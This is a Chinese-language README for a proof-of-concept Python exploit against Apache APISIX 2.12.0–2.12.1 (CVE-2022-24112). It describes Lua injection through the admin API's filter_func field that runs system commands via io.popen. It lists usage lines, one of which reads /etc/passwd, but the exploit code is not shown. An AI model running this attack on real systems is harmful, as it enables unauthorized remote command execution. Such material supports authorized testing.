
针对Apache APISIX 2.12.x RCE(CVE-2022-24112)的概念验证漏洞利用工具,通过Lua filter_func注入,在易受攻击的目标上执行任意系统命令。
此 Python 脚本是 Apache APISIX 2.12.0 和 2.12.1 版本中远程代码执行漏洞的概念验证 (PoC)。
该漏洞源于管理 API 中 filter_func Lua 字段的误用,允许攻击者注入任意 Lua 代码,通过 io.popen 执行系统命令。命令的响应将通过 ngx.say() 在 HTTP 响应中返回。
⚠️ 免责声明:此工具仅用于授权测试和教育目的。请勿在您不拥有或未获得明确测试许可的系统上使用。
requests 库 (pip install requests)exploit.py
python3 exploit.py -d <目标域名或IP> -p <端口> -c <命令>
python3 exploit.py -d 127.0.0.1 -p 9080 -c id
python3 exploit.py --domain 192.168.1.100 --cmd "uname -a"
python3 exploit.py -d vulnerable.host.local -c "cat /etc/passwd"